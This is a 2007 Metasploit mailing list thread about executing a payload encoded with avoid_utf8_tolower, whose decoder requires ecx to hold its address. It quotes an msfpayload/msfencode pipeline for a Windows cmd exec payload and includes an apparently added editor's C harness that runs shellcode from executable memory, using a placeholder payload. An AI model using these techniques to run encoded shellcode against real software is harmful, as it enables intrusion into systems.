Metasploit mailing list archives
Using encoded payload in executable
From: c0r31mp4ct at gmail.com (C0r3 1mp4ct)
Date: Fri, 8 Jun 2007 08:11:53 +0200
Yes! The software that I am trying to exploit converts the chars to lowercase, just like with the ActiveX component mentioned in the article about this encoder.

"The decoder stub is hardcoded to assume that ecx will hold the address."

Does it mean that I have to put the address of the encoded payload into ecx before control transfers to it? I mean, it isn't enough to transfer control with a JMP ESP; I need to have ECX store the address too. Could you help me to get it working?

On 6/7/07, mmiller at hick.org <mmiller at hick.org> wrote:
> On Thu, Jun 07, 2007 at 10:43:17AM +0200, C0r3 1mp4ct wrote:
> > Hi List! I tried to use the output of "./msfpayload -e windows/x86/exec CMD=cmd EXITFUNC=process R | ./msfencode -e x86/avoid_utf8_tolower c" in a C program that executes it by simply transferring control to the string buffer containing the encoded payload. The payload is generated on Fedora Core 6.
>
> The avoid_utf8_tolower encoder may require some additional parameters in order for it to be used correctly. This specific encoder does not have a getpc stub, and therefore relies on a certain register holding the address of the encoded payload (including the decoder stub). The decoder stub is hardcoded to assume that ecx will hold the address. Does your vulnerability require you to use this specific encoder?
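Editor's note: the following is an added example, not code from either poster. It shows the test harness the thread is talking about, written so that ecx holds the buffer address at the moment control reaches the decoder stub, which is exactly what a plain "cast the buffer to a function pointer and call it" harness does not guarantee. The payload bytes are a constructed placeholder (mov eax, 42 ; ret) standing in for the msfencode output; the function name run_with_ecx and the use of mmap are my choices. Since the encoder has no getpc stub, the same requirement applies in the real target: control must arrive with ecx already equal to the decoder's address, and a bare JMP ESP does not arrange that by itself.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

#if !defined(__i386__) && !defined(__x86_64__)
#error "x86 only: the avoid_utf8_tolower decoder stub expects its address in ecx"
#endif

/* Constructed placeholder, NOT msfencode output:
 *     mov eax, 42
 *     ret
 * Replace it with the C-format output of the post's pipeline
 *     ./msfpayload windows/x86/exec CMD=cmd EXITFUNC=process R | \
 *     ./msfencode -e x86/avoid_utf8_tolower c
 * A real decoder stub plus payload will not return cleanly like this one does. */
static const unsigned char payload[] = "\xb8\x2a\x00\x00\x00\xc3";

/* Copy the encoded bytes into RWX memory and transfer control with ecx
 * holding the buffer address.  The "c" constraint makes GCC put the pointer
 * in ecx (rcx on x86-64, of which the 32-bit stub only sees the low half, so
 * build with -m32 when testing real 32-bit shellcode).  A call rather than a
 * jmp is used so the placeholder stub can hand control back to us. */
static long run_with_ecx(const unsigned char *code, size_t len)
{
    void *buf = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) {
        perror("mmap");
        return -1;
    }
    memcpy(buf, code, len);

    long eax;
    __asm__ volatile(
        "call *%1"        /* decoder stub entered with ecx == buf */
        : "=a"(eax)       /* whatever the stub leaves in eax */
        : "c"(buf)        /* the stub's hard-coded assumption: ecx = its own address */
        : "memory", "cc",
#if defined(__x86_64__)
          "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"
#else
          "edx"
#endif
    );

    munmap(buf, 4096);
    return eax;
}

int main(void)
{
    long r = run_with_ecx(payload, sizeof(payload) - 1);
    printf("stub returned eax = %ld\n", r);
    return r == 42 ? 0 : 1;
}
```

With the placeholder bytes the harness prints 42, which only proves that control reached the buffer with ecx set up; with the actual msfencode output the decoder stub will read and rewrite the bytes following it relative to ecx, so any harness that lets the compiler pick the register (for example via a function pointer call) fails in a way that looks like a corrupt payload rather than a missing register setup.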
Current thread:
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 11)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)